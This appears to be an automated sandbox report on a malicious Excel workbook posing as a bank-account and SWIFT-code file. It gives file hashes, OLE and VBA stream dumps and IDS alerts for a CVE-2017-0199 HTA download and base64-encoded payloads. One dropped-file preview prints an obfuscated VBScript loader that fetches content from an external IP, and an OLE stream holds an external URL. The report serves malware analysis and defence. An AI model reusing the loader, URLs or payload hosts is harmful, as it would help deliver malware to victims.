                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):3496
                        Entropy (8bit):3.7329279321322377
                        Encrypted:false
                        SSDEEP:96:d/tbU3I/tK/tGU/tz/toU3o/tUq0qbqV1U3Iqx/tZ:d1IY1K1f1z1LY1Z5GVylx1Z
                        MD5:C8620389239F57F69E0A272F8A713231
                        SHA1:A2C026675520C308785673FB0DF0DEFEB545071C
                        SHA-256:0A807D8F8F5764C4B282F67C9F2F73788077BDB36CB40D28109D72DEADFEAF06
                        SHA-512:4CF71A2FA395F75D888F8D33C5C722956ADEF72E7FDA38CA783106540BC42B312107C3F0B2177912F7437E590F567B656F773B7945502BBDEE3E8353B15EF312
                        Malicious:true
                        Preview:..D.i.m. .c.z.x.R.O.u.L.h.K.U.c.G.a.e.c.e.o.e.m.K.B.N.q.e.k.p.L.Q.B.W.O.p.A.m.i.i.Z.a.p.C.i.s.b.K.Q.m.L.L.L.W.n.u.l.W.p.z.a.G.k.f.i.b.n.G.C.I.W.p.L.T.d.K.m.G.z.h.P.u.e.A.q.l.S.K.c.J.I.A.p.K.x.n.c.e.k.J.P.O.U.u.,. .P.A.m.K.P.t.v.h.e.R.o.W.m.d.S.f.f.c.k.l.i.O.m.O.k.A.h.f.W.N.e.s.o.O.A.z.W.c.o.m.Z.n.b.L.c.n.p.a.f.i.K.L.L.G.N.W.U.G.A.a.p.T.G.R.d.i.K.G.o.p.G.O.N.s.K.Z.A.f.j.c.W.n.L.S.R.C.a.P.i.K.h.e.Q.I.e.c.A.x.z.f.....S.e.t. .c.z.x.R.O.u.L.h.K.U.c.G.a.e.c.e.o.e.m.K.B.N.q.e.k.p.L.Q.B.W.O.p.A.m.i.i.Z.a.p.C.i.s.b.K.Q.m.L.L.L.W.n.u.l.W.p.z.a.G.k.f.i.b.n.G.C.I.W.p.L.T.d.K.m.G.z.h.P.u.e.A.q.l.S.K.c.J.I.A.p.K.x.n.c.e.k.J.P.O.U.u. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".M.S.X.M.L.2...S.e.r.v.e.r.X.M.L.H.T.T.P.".).....c.z.x.R.O.u.L.h.K.U.c.G.a.e.c.e.o.e.m.K.B.N.q.e.k.p.L.Q.B.W.O.p.A.m.i.i.Z.a.p.C.i.s.b.K.Q.m.L.L.L.W.n.u.l.W.p.z.a.G.k.f.i.b.n.G.C.I.W.p.L.T.d.K.m.G.z.h.P.u.e.A.q.l.S.K.c.J.I.A.p.K.x.n.c.e.k.J.P.O.U.u...O.p.e.n. .".G.E.T.".,. .".h.t.t.p.:././.9.4...1.5.6...6.5...2.4.7./.U.s.e.r.s._.A.P.I./.n.
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Jul 3 17:03:51 2024, Security: 1
                        Category:dropped
                        Size (bytes):114176
                        Entropy (8bit):7.81144892984142
                        Encrypted:false
                        SSDEEP:3072:lTAgWX3KR9pICih78eNlaChr4lj1DH17seId6QCn5:lTAGNfmg28C5gHhs/d6j5
                        MD5:7F553280F974B302299FAFA2262D681C
                        SHA1:4DDF621DBDB21A501AA1C523AE7D26758F7DE5D4
                        SHA-256:8321703F80E3C2BC2E34A151AEA495886D74CC03B85204BDA0FEADA954374CCF
                        SHA-512:6304D9999B1A34D2D588B52CE5B0844CB48BD6A88CCE77BFD7FD42B8389D0A4BA5A4490D37F88B5A06545D23DA8C1155AA434ED8BC11FC7456D908124B598C6E
                        Malicious:false
                        Preview:......................>...................................9...................|........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...........;.......=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:ASCII text, with CRLF line terminators
                        Category:dropped
                        Size (bytes):26
                        Entropy (8bit):3.95006375643621
                        Encrypted:false
                        SSDEEP:3:ggPYV:rPYV
                        MD5:187F488E27DB4AF347237FE461A079AD
                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                        Malicious:false
                        Preview:[ZoneTransfer]....ZoneId=0
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Jul 3 17:03:51 2024, Security: 1
                        Category:dropped
                        Size (bytes):114176
                        Entropy (8bit):7.81144892984142
                        Encrypted:false
                        SSDEEP:3072:lTAgWX3KR9pICih78eNlaChr4lj1DH17seId6QCn5:lTAGNfmg28C5gHhs/d6j5
                        MD5:7F553280F974B302299FAFA2262D681C
                        SHA1:4DDF621DBDB21A501AA1C523AE7D26758F7DE5D4
                        SHA-256:8321703F80E3C2BC2E34A151AEA495886D74CC03B85204BDA0FEADA954374CCF
                        SHA-512:6304D9999B1A34D2D588B52CE5B0844CB48BD6A88CCE77BFD7FD42B8389D0A4BA5A4490D37F88B5A06545D23DA8C1155AA434ED8BC11FC7456D908124B598C6E
                        Malicious:false
                        Preview:......................>...................................9...................|........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...........;.......=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                        File Type:data
                        Category:modified
                        Size (bytes):165
                        Entropy (8bit):1.4377382811115937
                        Encrypted:false
                        SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                        MD5:797869BB881CFBCDAC2064F92B26E46F
                        SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                        SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                        SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                        Malicious:true
                        Preview:.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                        File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Jul 2 08:19:03 2024, Security: 1
                        Entropy (8bit):7.760469902156288
                        TrID:
                        • Microsoft Excel sheet (30009/1) 47.99%
                        • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                        • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                        File name:Cuentas bancarias y cdigo ##Swift incorrecto.xla.xlsx
                        File size:164'352 bytes
                        MD5:b3b485912e2457ca61dc4481e204385a
                        SHA1:823436e03fcfc203877217d95fbb6ca3bfb78b31
                        SHA256:896a8259f8f9e5591c8f6bc3346c0b123a6b50efde85fbe8e913d1ec5af9f3a7
                        SHA512:4b6167bf88cb01bedb60ba314532e12657fb213bdf5a72b83de44d7a932508e6ba3ef0dcc3e09cfd4dd49450c0dea9193675a03e54e76fb4ac9a353fdbf5c70e
                        SSDEEP:3072:f8tq3KR9pqmLX13vW8fHXuImFlS+E7Ec7K8gaWnz7Wcw/bZY7f4:f6NHLX1fWLFlUV9Izfw
                        TLSH:C2F30138B2A6D401D08724BE8CC9E09B6211FD42FE96694F31C8BF2F49397E5C657A47
                        File Content Preview:........................>...................................A...................d..............................................................................................................................................................................
                        Icon Hash:2562ab89a7b7bfbf
                        Document Type:OLE
                        Number of OLE Files:1
                        Has Summary Info:
                        Application Name:Microsoft Excel
                        Encrypted Document:True
                        Contains Word Document Stream:False
                        Contains Workbook/Book Stream:True
                        Contains PowerPoint Document Stream:False
                        Contains Visio Document Stream:False
                        Contains ObjectPool Stream:False
                        Flash Objects Count:0
                        Contains VBA Macros:True
                        Code Page:1252
                        Author:
                        Last Saved By:
                        Create Time:2006-09-16 00:00:00
                        Last Saved Time:2024-07-02 07:19:03
                        Creating Application:Microsoft Excel
                        Security:1
                        Document Code Page:1252
                        Thumbnail Scaling Desired:False
                        Contains Dirty Links:False
                        Shared Document:False
                        Changed Hyperlinks:False
                        Application Version:786432
                        General
                        Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                        VBA File Name:Sheet1.cls
                        Stream Size:977
                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 . . g . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 .
                        Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 31 17 00 67 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                        Attribute VB_Name = "Sheet1"
                        Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                        Attribute VB_GlobalNameSpace = False
                        Attribute VB_Creatable = False
                        Attribute VB_PredeclaredId = True
                        Attribute VB_Exposed = True
                        Attribute VB_TemplateDerived = False
                        Attribute VB_Customizable = True
                        

                        General
                        Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                        VBA File Name:Sheet2.cls
                        Stream Size:977
                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 . 6 . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 .
                        Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 31 17 36 0c 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                        Attribute VB_Name = "Sheet2"
                        Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                        Attribute VB_GlobalNameSpace = False
                        Attribute VB_Creatable = False
                        Attribute VB_PredeclaredId = True
                        Attribute VB_Exposed = True
                        Attribute VB_TemplateDerived = False
                        Attribute VB_Customizable = True
                        

                        General
                        Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                        VBA File Name:Sheet3.cls
                        Stream Size:977
                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 . K . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                        Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 31 17 a3 4b 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                        Attribute VB_Name = "Sheet3"
                        Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                        Attribute VB_GlobalNameSpace = False
                        Attribute VB_Creatable = False
                        Attribute VB_PredeclaredId = True
                        Attribute VB_Exposed = True
                        Attribute VB_TemplateDerived = False
                        Attribute VB_Customizable = True
                        

                        General
                        Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                        VBA File Name:ThisWorkbook.cls
                        Stream Size:985
                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 . + . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . -
                        Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 31 17 2b 9d 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                        Attribute VB_Name = "ThisWorkbook"
                        Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                        Attribute VB_GlobalNameSpace = False
                        Attribute VB_Creatable = False
                        Attribute VB_PredeclaredId = True
                        Attribute VB_Exposed = True
                        Attribute VB_TemplateDerived = False
                        Attribute VB_Customizable = True
                        

                        General
                        Stream Path:\x1CompObj
                        CLSID:
                        File Type:data
                        Stream Size:114
                        Entropy:4.25248375192737
                        Base64 Encoded:True
                        Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                        General
                        Stream Path:\x5DocumentSummaryInformation
                        CLSID:
                        File Type:data
                        Stream Size:244
                        Entropy:2.889430592781307
                        Base64 Encoded:False
                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                        Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                        General
                        Stream Path:\x5SummaryInformation
                        CLSID:
                        File Type:data
                        Stream Size:200
                        Entropy:3.3020681057018666
                        Base64 Encoded:False
                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . P . . . . . . . . .
                        Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                        General
                        Stream Path:MBD000391C8/\x1CompObj
                        CLSID:
                        File Type:data
                        Stream Size:99
                        Entropy:3.631242196770981
                        Base64 Encoded:False
                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                        Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                        General
                        Stream Path:MBD000391C8/Package
                        CLSID:
                        File Type:Microsoft Excel 2007+
                        Stream Size:31533
                        Entropy:7.708123809242454
                        Base64 Encoded:True
                        Data ASCII:P K . . . . . . . . . . ! . c . 7 . . . U . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                        Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 63 c2 18 37 9c 01 00 00 55 06 00 00 13 00 d6 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 d2 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                        General
                        Stream Path:MBD000391C9/\x1Ole
                        CLSID:
                        File Type:data
                        Stream Size:444
                        Entropy:4.596380200058574
                        Base64 Encoded:False
                        Data ASCII:. . . . - T 6 8 . . . . . . . . . . . . L . . . y . . . K . H . . . h . t . t . p . : . / . / . h . o . p . . . f . y . i . / . p . p . l . t . L . . . B * C q r ? . . X . . " 8 . . . . . . . . . . . . . . . . . . . . P . P . I . k . j . g . 4 . E . k . 1 . F . 5 . r . A . 7 . P . 4 . 2 . c . g . h . g . p . 3 . f . T . 5 . 8 . 9 . h . z . u . t . f . s . F . 4 . Y . j . r . z . o . q . F . e . N . U . 0 . x . Q . E . F . 2 . A . c . e . U . 3 . I . 8 . 3 . A . p . 5 . l . 3 . A . F . 4 . y . x . s . w . P
                        Data Raw:01 00 00 02 2d a8 99 54 97 36 a0 38 00 00 00 00 00 00 00 00 00 00 00 00 4c 00 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b 48 00 00 00 68 00 74 00 74 00 70 00 3a 00 2f 00 2f 00 68 00 6f 00 70 00 2e 00 66 00 79 00 69 00 2f 00 70 00 70 00 6c 00 74 00 4c 00 00 00 42 f6 2a 43 a9 b1 71 ec f9 e5 a2 f3 72 3f d9 10 15 58 91 15 ea 03 ec 22 38 86 eb f3 d0 d8 ff ff ff ff 00 00 00 00
                        General
                        Stream Path:Workbook
                        CLSID:
                        File Type:Applesoft BASIC program data, first line number 16
                        Stream Size:117017
                        Entropy:7.9938003003893385
                        Base64 Encoded:True
                        Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . } . . z _ 3 . x B . Q . . g . b . u . . U $ ' . . . . . . . . . . U . . . \\ . p . . 3 W . C : [ 8 r . d . 7 . < 5 7 I h . ' . r H . u . N . $ a . n { H b 1 / ^ m e . h m j ! ] ~ + . . w 3 . % . * . S ? x c B . . . . a . . . . . . = . . . } ) X . . . + R 3 R 6 u f = . . . . F . . . . . . . . @ = . . . . . e . . . - . . . = . . . P . ^ . . | . @ . . . G q . . . " . . . . . . . . Q . . . 6 . . . 9 m 1 . . . Z . . . . g . . d . \\ . . 1 . . . & ~ ` . _ . A
                        Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 7d 1b 8e ce ea cf ca d1 0c f3 7a 5f 33 0c e0 e4 78 42 04 eb a2 fb 51 18 da af d9 67 c5 0e 62 0a 93 a4 75 cc 16 cf f6 09 84 a1 55 bd 9c 96 24 27 87 00 00 00 e1 00 02 00 b0 04 c1 00 02 00 e1 55 e2 00 00 00 5c 00 70 00 14 33 ef 57 1a cf fa 43 3a e7 20 5b 38 72 1b 64 ae 16 37 e4 ec 9f 95 91 3c 35
                        General
                        Stream Path:_VBA_PROJECT_CUR/PROJECT
                        CLSID:
                        File Type:ASCII text, with CRLF line terminators
                        Stream Size:525
                        Entropy:5.1879617710632235
                        Base64 Encoded:True
                        Data ASCII:I D = " { D 2 2 9 D 0 8 B - 1 B 4 F - 4 F 9 7 - A B 5 F - 8 7 E 0 A 3 F D 3 2 1 0 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 0 E 0 C F 6 1 1 1 E 3 3 3 7 3 7 3
                        Data Raw:49 44 3d 22 7b 44 32 32 39 44 30 38 42 2d 31 42 34 46 2d 34 46 39 37 2d 41 42 35 46 2d 38 37 45 30 41 33 46 44 33 32 31 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                        General
                        Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                        CLSID:
                        File Type:data
                        Stream Size:104
                        Entropy:3.0488640812019017
                        Base64 Encoded:False
                        Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                        Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
                        General
                        Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                        CLSID:
                        File Type:data
                        Stream Size:2644
                        Entropy:3.988033398476316
                        Base64 Encoded:False
                        Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                        Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                        General
                        Stream Path:_VBA_PROJECT_CUR/VBA/dir
                        CLSID:
                        File Type:data
                        Stream Size:553
                        Entropy:6.359640370800944
                        Base64 Encoded:True
                        Data ASCII:. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . h . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2 E .
                        Data Raw:01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 94 a0 94 68 0d 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                        07/03/24-18:03:46.611600TCP2020424ET CURRENT_EVENTS Unknown EK Landing Feb 16 2015 b64 2 M18049172198.46.178.144192.168.2.22
                        07/03/24-18:03:28.517103TCP2024449ET CURRENT_EVENTS SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl4916880192.168.2.22198.46.178.144
                        07/03/24-18:03:45.426374TCP2018856ET TROJAN Windows executable base64 encoded804917191.92.254.194192.168.2.22
                        07/03/24-18:03:26.763057TCP2024449ET CURRENT_EVENTS SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl4916680192.168.2.22198.46.178.144
                        07/03/24-18:03:45.748672TCP2049038ET TROJAN Malicious Base64 Encoded Payload In Image804917191.92.254.194192.168.2.22
